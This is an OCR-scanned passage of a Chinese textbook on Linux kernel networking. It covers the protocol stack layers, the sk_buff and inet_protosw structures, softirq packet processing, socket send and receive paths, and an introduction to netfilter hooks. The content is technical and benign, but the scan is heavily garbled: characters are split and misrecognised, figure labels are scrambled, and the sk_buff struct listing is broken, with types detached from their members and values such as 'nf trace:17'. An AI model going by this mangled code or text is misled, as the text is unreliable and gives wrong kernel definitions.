路 由 (TCPIP) 以 大 网 监 四 (unix 域 ) 协议 层 
net/ drivers/net/slip net/loopback driversnet/irda | |\ 和 
(以 太 网 arp) | (SLID (oopback) (RDA) ”| 以 太 网 网 卡 驱 动 | 接口 层 


图 16.2 映射 到 Linux 代码 的 3 个 内 核 层 的 源 代 码 组 织 


如 图 16.2 所 示 ， 以 太 网 相关 的 为 本 书 涉及 的 部 分 ， 其 他 (例如 SLIP、IRDA 等 ) 部 分 


是 为 了 比较 而 月 


日。 


16.1.2 内核 中 网 络 部 分 流程 简介 
网 络 协议 本 是 由 若干 个 层 组 成 的 ， 网 络 数据 的 流程 主要 是 指 在 协议 栈 的 各 个 层 之 间 的 


传递 。 在 第 7.2 节 


节 里 介绍 了 TCP 网 络 编程 的 流程 , 一 个 TCP 服务 器 的 流程 按照 建立 socket() 


函数 ， 绑 定 地 址 端口 bind0 函 数 ， 侦 听 端 口 listen0) 函 数 ， 接 收 连 接 acceptO 函 数 ， 发 送 数据 
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send() 函 数 ， 接 收 数据 recv0 〇 函数 ， 关 闭 socket() 函 数 的 顺序 来 进行 。 与 此 对 应 内 核 的 处 理 
过 程 也 是 按照 此 顺序 进行 的 ， 网 络 数据 在 内 核 中 的 处 理 过 程 主要 是 在 网 卡 和 协议 栈 之 间 进 
行 : 从 网 卡 接收 数据 ， 交 给 协议 栈 处 理 ， 协议 栈 将 需要 发 送 的 数据 通过 网 络 发 出 去 。 

如 图 16.3 所 示 ， 总 结 了 各 层 间 在 网 络 输入 输出 时 的 层 间 调 用 关系 。 由 图 中 可 以 看 出 ， 
数据 的 流向 主要 有 两 种 。 应 用 层 输出 数据 时 ， 数 据 按照 自 上 而 下 的 顺序 ,依次 通过 插口 层 、 
协议 层 和 接口 层 ， 当 有 数据 到 达 的 时 候 ， 自 下 而 上 依次 通过 接口 层 、 协 议 层 和 插口 层 的 方 
式 ， 在 内 核 层 传递 。 


插口 层 
(socket) 


函数 调用 插口 队列 
\ 软 中 断 


协议 层 EE 
(TCP、UDP、IP、ICMP 、IGMP 等 ) (由 接口 层 产生 ) 


协议 队列 
启动 输出 (IP 输 入 队列 ) 


硬 中 断 
(由 网 络 设备 产生 ) 


图 16.3 网络 输入 输出 的 各 层 间 调用 


应 用 层 Socket 的 初始 化 、 绑 定 (bind) 和 销毁 是 通过 调用 内 核 层 的 socket() 函 数 进 行 资 
源 的 申请 和 销毁 的 。 

发 送 数据 的 时 候 , 将 数据 由 插口 层 传递 给 协议 层 , 协议 层 在 UDP 层 添 加 UDP 的 首部 、 
TCP 层 添加 TCP 的 首部 、 IP 层 添加 IP 的 首部 , 接口 层 的 网 卡 则 添加 以 太 网 相关 的 信息 后 ， 
通过 网 卡 的 发 送 程序 发 送 到 网 络 上 。 

接收 数据 的 过 程 是 一 个 相反 的 过 程 ， 当 有 数据 到 来 的 时 候 ， 网 卡 的 中 断 处 理 程序 将 数 
据 从 以 太 网 网 卡 的 FIFO 对 列 中 接收 到 内 核 , 传递 给 协议 层 ,协议 层 在 IP 层 剥离 IP 的 首部 、 
UDP 层 剥 离 UDP 的 首部 、TCP 层 剥 离 TCP 的 首部 后 传递 给 插口 层 ， 插 口 层 查询 socket 的 
标识 后 ， 将 数据 送 给 用 户 层 匹配 的 socket。 

如 图 16.4 所 示 为 Linux 内 核 层 的 网 络 协议 栈 的 架构 视图 。 最 上 面 是 用 户 空间 层 ， 应 用 
层 的 程序 位 于 此 处 。 最 底部 是 物理 设备 , 例如 以 太 网 网 卡 等 ,提供 网 络 数据 的 连接 、 收 发 。 
中 间 是 内 核 层 , 即 网 络 协议 栈 子 系统 。 流 经 网 络 栈 内 部 的 是 socket 缓冲 区 (由 结构 sk_buffs 
接连 )， 它 负责 在 源 和 汇 点 之 间 传 递 报 文 数据 。 在 16.1.4 节 中 将 会 对 sk_buff 的 结构 进行 
介绍 。 
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下 
用 户 空间 应 用 层 
J 
x 
| 系统 调用 接口 
协议 诊断 接口 


可 册 导 了 


网 络 协议 


QQ 


设备 诊断 接口 


设备 驱动 


硬件 设备 


图 16.4 Linux 内 核 网 络 协议 栈 架 构 


顶部 (参见 图 16.4) 是 系统 调用 接口 ， 它 为 用 户 空间 的 应 用 程序 提供 了 一 种 访问 内 核 
网 络 子 系统 的 接口 。 位 于 其 下 面 的 是 一 个 协议 无 关 层 ， 它 提供 了 一 种 通用 方法 来 使 用 底层 
传输 层 协议 。 然 后 是 实际 协议 ， 在 Linux 中 包括 内 购 的 协议 TCP、UDP， 当 然 还 有 卫 。 然 
后 是 另外 一 个 网 络 设备 协议 无 关 层 ， 提 供 了 与 各 个 设备 驱动 程序 通信 的 通用 接口 ， 最 下 面 
是 设备 驱动 程序 本 身 。 


16.1.3 ”系统 提供 修改 网 络 流程 点 


16.1.2 节 介 绍 了 网 络 数据 在 内 核 中 的 流程 ， 网 络 中 的 数据 在 通常 情况 下 按照 16.1.2 节 
所 述 的 流程 传递 。Linux 内 核 中 还 提供 了 一 种 灵活 修改 网 络 数据 的 机 制 ， 用 户 可 以 利用 这 
种 机 制 获得 和 修改 内 核 层 的 网 络 数据 和 属性 设置 。 

如 图 16.5 所 示 , 白色 的 框 为 网 络 数据 的 流向 , 协议 栈 按照 正常 的 方式 进行 处 理 和 传递 。 
Linux 内 核 在 网 络 数据 经 过 的 多 个 地 点 设置 了 检查 点 ， 当 到 达 检 查 点 的 时 候 ， 会 检查 这 些 
点 上 是 否 有 用 户 设 置 的 处 理 方法 ， 按 照 用 户 的 处 理 规则 对 网 络 数据 进行 处 理 后， 数据 会 再 
次 按照 正常 的 网 络 流程 传递 。 
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数据 流向 一 


检查 点 


图 16.5 网 络 数据 检查 点 示意 图 


16.1.4 sk_buff 结构 


内 核 层 和 用 户 层 在 网 络 方面 的 差别 很 大 ， 在 内 核 的 网 络 层 中 sk_buff 结构 占有 重要 的 
地 位 ， 儿 乎 所 有 的 处 理 均 与 此 结构 有 关系 。 网 络 协议 栈 是 一 个 层次 架构 的 软件 结构 ， 层 与 
层 之 间 通 过 预定 的 接口 传递 报 文 。 网 络 报 文中 包含 了 在 协议 各 层 使 用 到 的 各 种 信息 。 由 于 
网 络 报 文 之 间 的 大 小 不 是 固定 的 ， 因 此 采用 合适 的 数据 结构 来 存储 这 些 网 络 报 文 就 显得 非 

1， 结构 sk_buff 的 原型 


在 Linux 的 3.5 版 本 的 内 核 中 ， 采 用 结构 sk_bu 任 来 存储 这 些 数据 。 在 这 个 结构 中 ， 
既 有 指向 网 络 报 文 的 指针 ， 同 时 也 有 描述 网 络 报 文 的 变量 。sk_buff 数据 结构 的 代码 如 下 
所 示 。 


struct sk buff 


{ 

struct sk buff *next; 
struct sk buff *prev; 
struct sock *SKk; 
ktime t tstamp; 
struct net device *dev; 
union 

struct dst entry *dst; 
struct rtable *rtable; 
jh 

struct sec path *Sp;? 
char cb[48]; 
unsigned int len, 
data_ len; 

Ul6 mac_len, 
hdr _ len; 

union 

{ 


。469 。 


第 3 篇 ”Linux 内 核 网 络 编程 
_wsum csum; 
struct 
{ 
ul6 csum start; 
ul6 csum offset; 
}; 
}; 
_u32 priority; 
_u8 local df:1, 
cloned:1, 
ip summed:2, 
nohdr:1, 
nfctinfo:3; 
_u8 pkt type:3, 
fclone:2, 
ipvs_property:1, 
peeked:1, 
nf trace:17 
bel6 protocol; 
void (*destructor) (struct sk buff *skb); 


struct nf conntrack 
struct sk buff 
struct nf bridge info 
int 
_ul6 
_ul6 
ul6 
u8 
dma cookie t 
V32 
032 
Sk buff data 七 
Sk buff data t 
Sk buff data t 
Sk buff data 七 
Sk buff data 七 
unsigned char 


unsigned int 
atomic t 
}; 


*nfct; 

*nfct reasm; 

*nf bridge; 

E> 

queue mapping; 
tc_index; 

tc verd; 

ndisc nodetype:2; 
dma cookie; 
secmark; 

mark; 

transport header; 
network header; 
mac header; 

tadls 

end; 

*head, 

*data; 

truesize; 

users; 


sk_buff 主要 成 员 的 含义 如 下 所 述 。 
口 next: sk_bu 信 链表 中 的 下 一 个 缓冲 区 。 


口 


口 


OOODO 
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prev: sk_buff 链表 中 的 前 一 个 缓冲 区 。 以 上 两 个 变量 将 sk_buff 链 接 到 一 个 双向 链 
表 中 。 

sk: 本 网 络 报 文 所 属 的 sock 结构 ， 此 值 仅 在 本 机 发 出 的 报 文中 有 效 ， 从 网 络 收 到 
的 报 文 此 值 为 空 。 

tstamp: 报 文 收 到 的 时 间 戳 。 

dev: 收 到 此 报 文 的 网 络 设备 。 

transport_header: 传输 层 头 部 。 

network _ header: 网 络 层 头 部 。 
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mac_header: 链接 层 头 部 。 

cb: 用 于 控制 缓冲 区 。 每 个 层 都 可 以 使 用 此 指针 ， 将 私有 的 数据 放置 于 此 。 
len: 有 效 数 据 长 度 。 

data len: 数据 长 度 。 

mac_len: 连接 层 头 部 长 度 ， 对 于 以 太 网 ， 指 MAC 地 址 所 用 的 长 度 ， 为 6。 
hdr len: skb 的 可 写 头 部 长 度 。 

csum: 校 验 和 【包含 开始 和 偏 移 ) 。 

csum_start: 当 开 始 计算 校 验 和 时 从 skb->head 的 偏 移 。 

csum_offset， 从 csum_start 开始 的 偏 移 。 

local_df: 允许 本 地 分 片 。 

pkt_type: 包 的 类 别 。 

priority: 包 队 列 的 优先 级 。 

truesize: 报 文 缓冲 区 的 大 小 。 

head: 报 文 缓冲 区 的 头 。 

data: 数据 的 头 指针 。 

tail: 数据 的 尾 指针 。 

end: 报 文 缓冲 区 的 尾部 。 


2. sk_buff 的 含义 


如 图 16.6 所 示 为 结构 sk_bu 仔 的 框图 ， 其 中 的 tail、end、head 和 data 是 对 网 络 报 文 前 
分 的 描述 。 

网 络 报 文 存 储 空间 是 在 应 用 层 发 送 网 络 数据 或 者 网 络 设备 收 到 网 络 数据 时 动态 分 配 
的 ， 分 配 成 功 之 后 ， 将 接收 或 者 发 送 的 网 络 数据 填充 到 这 个 存储 空间 中 去 。 将 网 络 数据 填 
充 到 存储 空间 时 ， 在 存储 空间 的 头 部 预 留 了 一 定数 量 的 空 除 ， 然 后 从 此 偏 移 量 开始 将 网 络 
报 文 复制 到 存储 空间 中 。 

结构 sk_buff 以 sk_buff head 构成 一 个 环 状 的 链 ， 如 图 16.7 所 示 ，next 变量 指向 下 一 
个 sk_buff 结构 ，prev 变量 指向 前 一 个 sk_buff 结构 。 内 核 程 序 通过 访问 其 中 的 各 个 单元 来 
遍历 整个 协议 栈 中 的 网 络 数 据 。 


DoOooOoOoOoOoOoOoOoOoOoOoOoOoOoOOoOoOOOOODO DO 


16.1.5 网络 协议 数据 结构 inet_protosw 


第 5 章 中 对 TCP/IP 的 网 络 协议 族 进行 了 介绍 (IP、TCP、UDP 等 )。 其 中 协议 TCP、 
UDP、RAW 在 文件 linux-3.9.5/net/ipv4/af_inet.c 中 一 个 名 为 inet_init() 的 函数 中 进行 了 初始 
化 (因为 TCP 和 UDP 都 是 inet 簇 协议 的 一 部 分 )。inet_init0 函 数 使 用 proto_register() 函 数 
来 注册 每 个 内 嵌 协 议 。 

通过 linux-3.9.5/netiipv4/ 目 录 中 tcp.c 和 raw.c 文件 中 的 proto 接口 , 可 以 了 解 各 个 协议 是 
如 何 标识 自己 的 。 这 些 协议 接口 每 个 都 按照 类 型 和 协议 映射 到 inetsw_array， 该 数组 将 内 髓 
协议 与 操作 映射 到 一 起 。inetsw_array 结构 及 其 关系 如 图 16.8 所 示 。 最 初 ， 会 调用 inet_init() 
函数 中 的 inet register_protosw0 函 数 将 这 个 数组 中 的 每 个 协议 都 初始 化 为 inetsw。 函 数 inet_ 
init() 也 会 对 各 个 inet 模块 进行 初始 化 ， 如 ARP、ICMP 和 卫 模块 ， 以 及 TCP 和 UDP 模块 。 
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sk_buff 结 构 
网 络 报 文 存储 区 
head 
data 
tail 
end 


frags[MAX_SKB 


frag list 
frag_list[0] 
frag list[1] 


frag list[2] 


FRAGS] 


图 16.6 ”sk_buff 的 数据 结构 


i 
站 
区 


=)| 
发 
亚 
Xl 


——|next 


prev 


next 


prev 


sk_buff head 


图 16.7 


sk_bu 人 f head 与 sk_bu 作 生成 的 链表 
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struct inet protosw 
inetsw_array] 


SOCK_STREAM 


IPPROTO TCP 


&tcp prot 


&inet_stream ops THIS MODULE 


udp_lib close 


SOCK_DGRAM ip4_datagram_connect 


IPPROTO UDP 


&inet_dgram_ops 


struct proto_ops 
inet_dgram_ops 


SOCK RAW PF_INET 


IPPROTO IP THIS MODULE 


Rraw_prot inet_release 


Rinet_sockraw_ops inet_bind 


图 16.8 inet protosw 数组 结构 
在 图 16.8 中 ，proto 结构 定义 了 传输 特有 的 方法 ， 而 proto_ops 结构 则 定义 了 通用 的 
socket() 方 法 。 可 以 通过 调用 inet register_protosw() 函 数 将 其 他 协议 加 入 到 inetsw 协议 中 。 
例如 ，SCTP 就 是 通过 调用 linux-3.9.5/net/sctp/protocol.c 中 的 sctp_init 加 入 其 中 的 。 


16.2 软 中 断 CPU 报 文 队列 及 其 处 理 
软 中 断 是 Linux 内 核 中 的 一 种 概念 ， 它 利用 硬件 中 的 中 断 概 念 ， 用 软件 方式 对 此 进行 
模拟 ， 实 现 相似 的 执行 效果 。 
16.2.1 Linux 内 核 网 络 协议 层 的 层 间 传 递 手段 一 一 软 中 断 
网 络 协议 栈 是 分 层 实现 的 ， 如 何 实现 高 效 的 网 络 数据 是 协议 栈 设计 的 核心 问题 之 一 。 
1. Linux 内 核 中 软 中 断 的 机 制 
在 Linux 内 核 中 是 采用 软 中 断 的 方式 实现 的 ， 软 中 断 机 制 的 实现 原理 如 图 16.9 所 示 。 
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人 软 中 断 向 量 结构 


void (*action)(struct softirq action *) 
Void *data 


[| 软 中 断 守护 
内 核 线程 


图 16.9 软 中 断 架构 示意 图 


软 中 断 机 制 的 构成 核心 元 素 包 括 软 中 断 状态 、 软 中 断 向 量 表 和 软 中 断 守护 内 核 线程 。 

口 软 中 断 状 态 : 即 是 否 有 触发 的 软 中 断 未 处 理 。 

口 软 中 断 向 量 表 : 包含 两 个 成 员 变量 ， 一 个 是 处 理 此 软 中 断 的 回调 函数 ， 另 一 个 是 

处 理 时 所 需 的 参数 。 
口 软 中 断 守护 内 核 线程 : 内 核 建 立 一 个 内 核 线程 ksoftirqd 来 轮 询 软 中 断 状态 ， 调 用 
软 中 断 向 量 表 中 的 软 中 断 回调 函数 处 理 中 断 。 

Linux 内 核 中 的 软 中 断 的 工作 框架 模拟 了 实际 的 硬 中 断 处 理 过 程 。 当 某 一 软 中 断 事件 
发 生 后 ， 首 先 调用 raise_softirq() 函 数 设 置 对 应 的 中 断 标 记 位 ， 触 发 中 断 事务 。 然 后 会 检测 
中 断 状态 寄存 器 的 状态 ， 如 果 ksoftirqd 通过 查询 发 现 某 一 软 中 断 事务 发 生 之 后 ， 那 么 通过 
软 中 断 向 量 表 调用 软 中 断 服 务 程序 action。 

软 中 断 的 过 程 与 硬 中 断 是 十 分 类 似 的 ， 二 者 的 唯一 不 同 之 处 是 从 中 断 向 量 到 中 断 服务 
程序 的 映射 过 程 。 在 CPU 的 硬件 中 断 发 生 之 后 ，CPU 的 具体 的 服务 程序 通过 中 断 向 量 值 
进行 映射 ， 这 个 过 程 是 硬件 自动 完成 的 。 但 是 软 中 断 的 中 断 映 射 不 是 自动 完成 的 ， 需 要 中 
断 服务 守护 线程 去 实现 这 一 过 程 ， 这 也 就 是 软件 模拟 的 中 断 。 


2. Linux 内 核 中 软 中 断 的 使 用 方法 
在 Linux 系统 中 最 多 可 以 同时 注册 32 个 软 中 断 ， 目 前 系统 使 用 了 6 个 软 中 断 , 它们 是 


定时 器 处 理 、SCSI 处 理 、 网 络 收发 处 理 ， 以 及 tasklet 机 制 ， 这 里 的 tasklet 机 制 就 是 用 来 
实现 下 半 部 的 ， 描 述 软 中 断 的 核心 数据 结构 为 中 断 向 量 表 ， 其 定义 如 下 : 


struct softirq action 
f 


void (*action) (struct softirqg action *); 
void *data; 

I 

口 action 为 软 中 断 服务 程序 。 
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口 data 为 服务 程序 输入 参数 。 

软 中 断 守 护 程序 是 软 中 断 机 制 实现 的 核心 ， 它 的 实现 过 程 比较 简单 。 通 过 查询 软 中 断 
的 状态 来 判断 是 否 发 生 事件 ， 当 发 生 事件 就 会 映射 软 中 断 向 量 表 , 调用 执行 注册 的 action0 
函数 就 可 以 了 。 从 这 一 点 分 析 可 以 看 出 ， 软 中 断 的 服务 程序 是 daemon。 在 Linux 中 软 中 断 
daemon 线程 函数 为 do_softirq()。 

触发 软 中 断 事务 通过 raise_softirq() 函 数 来 实现 ， 该 函数 就 是 在 中 断 关 闭 的 情况 下 设置 
软 中 断 状态 位 ， 然 后 判断 如 果 不 再 中 断 上 下 文 ， 那 么 直接 唤醒 守护 daemon。 

常用 的 软 中 断 函数 列表 如 下 所 述 。 

口 open_softirq() 函 数 : 它 注册 一 个 软 中 断 ， 将 软 中 断 的 服务 程序 注册 到 系统 的 软 中 断 

向 量 表 。 

口 raise_softirq() 函 数 : 设置 软 中 断 状态 映射 表 ， 触 发 软 中 断 事务 响应 。 

Linux 软 中 断 的 处 理 框架 也 采用 了 上 半 部 和 下 半 部 的 处 理 方式 。 软 中 断 的 上 半 部 处 理 
紧急 的 、 需 要 立即 处 理 的 、 关 键 性 的 处 理 动作 ， 例 如 网 卡 驱动 的 接收 动作 ， 当 有 中 断 到 达 
的 时 候 ， 先 查询 网 卡 的 中 断 寄存 器 ， 判 断 为 何 种 方式 的 中 断 ， 清 空中 断 寄存 器 后 ， 复 制 数 
据 ， 然 后 设置 软 中 断 的 状态 ， 触 发 软 中 断 。 软 中 断 的 下 半 部 进行 数据 处 理 ， 而 下 半 部 则 相 
对 来 说 并 不 是 非常 紧急 的 ， 通 常 还 是 比较 耗 时 的 ， 因 此 由 系统 自行 安排 运行 时 机 ， 不 在 中 
断 服务 上 下 文中 执行 。 


16.2.2 网络 收发 处 理 软 中 断 的 实现 机 制 


网 络 收发 的 处 理 通过 软 中 断 进行 处 理 ， 考 虑 到 优先 级 问题 , 分 别 占 用 了 向 量 表 中 的 2 号 
和 3 号 软 中 断 来 分 别处 理 接收 和 发 送 。 网 络 协 议 栈 的 软 中 断 机 制 的 实现 原理 如 图 16.10 所 示 。 


软 中 断 状态 机 
软 中 断 向 量 表 。。 软 中 断 向 量 结构 
void (*action)(struct softirq_action #) 
六 | void *data 
网 络 软 中 断 、、__ [中 几 处 理 函 娄 


图 16.10 ”协议 栈 中 的 软 中 断 架 构 示意 图 


当 网 络 的 软 中 断 事 件 发 生 之 后 ， 执 行 net_rx_action() 函 数 或 者 net_tx_action() 函 数 的 软 
中 断 服务 程序 ， 该 服务 程序 会 扫描 一 个 网 络 中 断 状态 的 值 ， 查 找 中 断 源 ， 执 行 具体 服务 程 
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序 。 在 这 里 举 一 个 例子 加 以 说 明 : 当 网 络 上 有 数据 时 ， 发 生 了 硬件 中 断 ， 硬 件 中 断 服 务 程 
序 会 接收 网 络 数据 ， 设 置 中 断 状态 ， 并 将 网 络 数据 挂 接 到 链表 上 ， 进 行 中 断 调度 ， 这 一 步 
可 以 通过 net scheduleO) 函 数 完成 。 硬 件 中 断 服 务 程序 最 后 退出 并 且 CPU 开始 调度 软 中 断 ， 
软 中 断 daemon 会 发 现 网 络 软 中 断 发 生 了 事件 ， 其 会 执行 网 络 中 断 对 应 的 服务 程序 ， 即 进 
入 网 络 协议 栈 处 理 程序 。 


16.3 ”socket 数据 如 何在 内 核 中 接收 和 发 送 


socket 数据 在 内 核 中 的 流程 主要 包含 初始 化 、 销 毁 、 接 收 和 发 送 网 络 数据 。 其 过 程 涉 
及 网 卡 驱 动 、 网 络 协议 栈 和 应 用 层 的 接口 函数 。 


16.3.1 socket() 函 数 的 初始 化 


创建 socket0 函 数 需 要 传递 family、type、protocol 这 3 个 参数 。 创 建 socket() 函 数 其 实 
就 是 创建 一 个 socket 实例 ， 然 后 创建 一 个 文件 描述 符 结构 。 创 建 套 接 字 文 件 描述 符 会 互相 
建立 一 些 关 联 ， 即 建立 互相 连接 的 指针 ， 并 且 初 始 化 这 些 对 文件 的 写 读 操作 映射 到 socket 
的 read()、write() 函 数 上 来 。 

在 初始 化 套 接 字 的 时 候 ， 同 时 初始 化 socket 的 操作 函数 (proto_ops 结构 )。 如 果 传 入 
的 type 参数 是 STREAM 类 型 ， 那 么 就 初始 化 SOCKET->ops 为 inet_stream_ops。 

参数 inet_stream_ops 是 一 个 结构 体 ,包含 了 stream 类 型 的 socket 操作 的 一 些 入 口 函 数 。 
在 这 些 函 数 里 主要 做 的 是 对 socket 进行 相关 的 操作 。 

创建 socket 的 同时 还 创建 一 个 sock 结构 的 数据 空间 。 初始 化 sock, 初始 化 过 程 主要 做 
的 事情 是 初始 化 3 个 队列 : receive_queue (接收 到 的 数据 包 sk_bu 储 链表 队列 )，send_queue 
(需要 发 送 数 据 包 的 sk_bu 任 链表 队列 )，backlog queue (主要 用 于 tcp 中 三 次 握手 成 功 的 那 
些 数据 包 )。 根 据 family、type 参数 ， 初 始 化 sock 的 操作 ， 例 如 对 于 family 为 inet 类 型 的 ， 
type 为 stream 类 型 的 ，sock->proto 初始 化 为 tcp_prot， 其 中 包括 stream 类 型 的 协议 sock 操 
作对 应 的 入 口 函 数 。 

应 用 层 关闭 socket 时 ， 内 核 需要 释放 所 关闭 socket 申 


请 的 资源 。 on 
16.3.2 ”接收 网 络 数据 recv() 函 数 一 二 二 一 
网 络 数据 接收 依次 经 过 网 卡 驱 动 和 协议 栈 程序 ， 本 节 dm9000 接 收 程序 
以 DM9000A 网 卡 为 例 进行 介绍 接收 数据 的 过 程 。 Y 
如 图 16.11 所 示 , 网 卡 在 一 个 数据 包 到 来 时 , 会 产生 一 本 的 全 
个 硬 中 断 ， 网 络 驱动 程序 会 执行 中 断 处 理 过 程 ， 首 先 申请 | 
一 个 skb 结构 及 pkt_len+5 大 小 的 内 存 用 于 保存 数据 ,然后 将 skb 放 入 
便 将 接收 到 的 数据 从 网 卡 复制 到 这 个 skb 的 数据 部 分 中 。 eee 四 下 
当 数 据 从 网 卡 中 成 功 接收 后 , 调用 netif_rx(skb) 进 一 步 处 理 | 
数据 ， 将 skb 加 入 到 相应 的 input_pkt_queue 队列 中 ， 并 调 


日 netif rx_schedule() 函 数 ， 会 产生 一 个 软 中 断 来 执行 网 络 图 16.11 网 卡 接收 数据 流程 
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协议 栈 的 例 程 。 这 样 ， 中 断 的 上 半 部 已 完成 ， 以 下 的 工作 则 交 由 中 断 的 下 半 部 来 实现 。 

如 图 16.12 所 示 , 下 半 部 的 内 核 守护 线程 do_softirq() 函 数 , 将 执行 net_rx_action() 函 数 ， 
对 数据 进行 处 理 。IP 层 输入 处 理 程序 轮 询 处 理 输入 队列 中 的 每 个 人 P 数据 ， 在 整个 队列 处 
理 完毕 后 返回 。IP 层 验证 IP 首部 的 校 验 和 ， 处 理 IP 选项 ， 验 证 人 P 主 机 地 址 和 正确 性 等 ， 
并 调用 相应 协议 (TCP 或 者 UDP 等 ) 处 理 程序 。 接 收 的 进程 在 网 络 协议 栈 处 理 完毕 后 会 
收 到 唤醒 的 信号 ， 并 收 到 发 送 来 的 网 络 数据 。 


send 
net_rx_action 添加 TCP/UDP 数 据 
| 添加 IP 数 据 


IP 层 检查 数据 有 效 人 性 ip_send 


dev_queue_xmit 


TCP/UDP 协 议 处 理 


Pim 


唤醒 用 户 层 进程 网 络 驱动 发 送 数据 
图 16.12 ”协议 栈 处 理 数据 流程 图 16.13 ”协议 栈 处 理 数据 流程 


16.3.3 发送 网 络 数据 send() 函 数 


Linux 对 网 络 数据 的 发 送 过 程 的 处 理 与 接收 过 程 相 反 。 在 一 端 对 socket 进行 write0 函 
数 的 过 程 中 ， 首 先 会 把 要 write 的 字符 串 缓冲 区 整理 成 msghdr 的 数据 结构 形式 ， 然 后 调用 
sock_sendmsg() 函 数 把 msghdr 的 数据 传送 至 inet 层 。 

对 于 msghdr 结构 中 数据 区 中 的 每 个 数据 包 ， 创 建 sk_bu 任 结构 ， 填 充 数据 ， 挂 至 发 送 
队列 。 一 层 层 往 下 层 协 议 传递 ， 如 图 16.13 所 示 。 以 下 每 层 协议 不 再 对 数据 进行 复制 ， 而 
是 对 sk_bu 人 ff 结构 进行 操作 。 

最 后 调用 网 络 驱动 ， 发 送 数据 ， 在 网 络 发 送 成 功 后 要 产生 中 断 ， 将 发 送 结果 反馈 回应 
j 层 ， 此 过 程 与 接收 网 络 数据 的 过 程 类 似 。 


16.4 小 结 


本 章 介绍 了 Linux 内 核 代码 的 架构 , 特别 是 网 络 相关 的 部 分 , 并 对 结构 sk_bu 企 进行 了 
详细 的 分 析 ， 简 单 分 析 了 网 络 数据 的 流程 。 介 绍 了 Linux 的 软 中 断 方式 ， 对 网 络 协议 栈 中 
使 用 的 软 中 断 处 理 报 文 队列 的 方式 进行 了 简单 的 介绍 。 对 插口 层 的 网 络 数据 发 送 接收 的 流 
程 进行 了 分 析 。 
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在 第 16 章 中 对 Linux 的 网 络 协议 进行 了 简单 的 介绍 , 对 Linux 内 置 防火 墙 已 经 有 了 了 
解 。Linux 内 核 中 的 netfilter 框架 是 Linux 防火 墙 构建 的 基础 ， 使 用 这 个 框架 可 以 构建 用 户 
特定 的 网 络 数据 报 文 过 滤 规 则 和 处 理 方法 。 本 章 将 详细 地 介绍 netfilter 的 编程 框架 ， 主 要 
包括 以 下 内 容 : 

口 编程 的 框架 和 注意 事项 ; 

口 netfilter 的 5 个 钩子 挂 接 点 ; 

口 介绍 一 个 利用 netfilter 进行 编程 的 例子 ; 

口 利用 netfilter 进行 编程 时 的 其 他 注意 事项 , 例如 钩 子 优先 级 、 修 改 网 络 数据 造成 的 

CRC 错误 修正 等 。 


17.1 netfilter 


在 16.1.3 节 中 简单 介绍 了 Linux 内 核 中 修改 网 络 数据 的 检查 点 的 概念 ， 在 Linux 内 核 
中 netfilter 就 是 基于 这 种 机 制 实 现 的 。netfilter 的 这 种 机 制 使 得 防火 墙 的 构建 工作 变 得 更 加 
简单 ， 通 常情 况 下 只 需要 对 儿 个 过 滤 条 件 进行 解析 就 可 以 实现 基本 的 防火 墙 策略 。 


17.1.1 netfilter 简介 


Linux 环境 下 的 防火 墙 技术 从 2.0 的 内 核 版 本 到 目前 的 3.5 版 本 经 历 了 若干 的 技术 革 
新 ， 逐 步 发 展 起 来 。2.0 版 本 内 核 中 的 ipfwadm 是 Alan Cox 完成 的 ， 其 代码 来 自 FreeBSD 
的 内 核 ,2.2 版 本 内 核 中 的 ipchains 较 之 前 的 版 本 有 了 很 大 的 改进 。ipchains 维护 者 之 一 Paul 
Russell 针对 其 缺点 ,在 Linux kernel 2.3 系列 的 开发 过 程 中 形成 了 目前 netfilter 的 主要 架构 。 
用 户 空 间 的 防火 墙 管理 工具 ， 也 相应 地 发 展 为 iptables 。 

读者 可 以 访问 netfilter 的 网 站 http:/wwwnetfilterorg/， 获 得 netfilter/Iptables 的 代码 和 
相关 文档 。 在 netfilter 的 网 站 上 ， 还 可 以 看 到 netfilter 的 一 个 子 项 目 patch-o-matic， 其 中 收 
录 了 大 量 的 各 种 定制 kernel modules， 这 些 modules 给 读者 朋友 们 开发 自己 的 kernel 
modules， 提 供 了 非常 多 而 且 很 好 的 例子 。 

netfilteriptables 的 组 合 方式 使 用 户 构建 防火 墙 更 加 简单 ， 相 对 于 2.2 内 核 中 的 防火 墙 ， 
用 户 可 以 不 用 编写 或 者 修改 Linux 的 内 核 程序 (尽管 此 类 工作 正 变 得 越 来 越 简单 )。 例 如 只 
用 一 行 命令 就 可 以 允许 IP 为 192.168.1.250 的 网 络 访问 。 


$ iptables -A INPUT -s 192.168.1.250 -j ACCEPT 


netfilter 的 优势 不 仅 包括 防火 墙 的 实现 ， 还 包括 各 种 报 文 的 处 理工 作 《〈 如 报 文 的 加 密 、 
统计 等 )。 用 户 可 以 方便 地 利用 netfilter 提供 的 接口 实现 内 核 层 的 报 文 处 理 。 
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17.1.2 ”netfilter 框架 


netfilter 在 Linux 内 核 中 的 IPv4、IPv6 和 DECnet 等 网 络 协议 栈 中 都 有 相应 的 实现 。 本 
书 将 只 介绍 其 中 让 大 多 数 读 者 朋友 们 感 兴趣 的 IPv4 协议 栈 上 netfilter 的 实现 。 
IPv4 协议 栈 为 了 实现 对 netfilter 架构 的 支持 ， 在 PP 包 的 IPv4 协议 栈 上 的 传递 过 程 之 
中 ， 选 择 了 5 个 检查 点 。 在 这 5 个 检查 点 上 ， 各 引入 了 一 行 对 NF_HOOK() 宏 函数 的 一 个 
相应 的 调用 。 这 5 个 参考 点 被 分 别 命名 为 PREROUTING、LOCAL-IN、FORWARD、 
LOCAL-OUT 和 POSTROUTING。 关 于 这 5 个 检查 点 的 含义 ， 在 Iptables 的 使 用 说 明 中 有 
从 如 下 的 grep 输出 可 以 看 到 ，IPv4 协议 栈 实现 代码 对 NF_HOOKO 宏 函数 的 调用 : 
Ipmr.c:1250:NF HOOK(PF _ INET, NF_INET FORWARD, skb, skb->dev, dev, 
ipmr forward finish); 
Ip_forward.c:113:return NF HOOK(PF INET, NF _INET FORWARD, skb, skb->dev, 
rt->u.dst.dev, 
ip_forward finish); 
Ip_input.c:268:return NF_ HOOK (PF INET, NF_INET LOCAL IN, skb, skb->dev, NULL, 
ip local deliver finish); 
Ip_input.c :440:return NF _ HOOK(PF INET, NF _INET PRE ROUTING, skb, dev, NULL, 
ip rcv finish); 
Ip_output.c:274:NF HOOK(PF_INET, NF_INET_ POST ROUTING, newskb, 
NULL, newskb->dev, 
ip_dev loopback xmit); 
Ip output.c:290:NF HOOK(PF INET, NF INET POST ROUTING, newskb, NULL, 
newskb->dev, ip dev loopback xmit); 
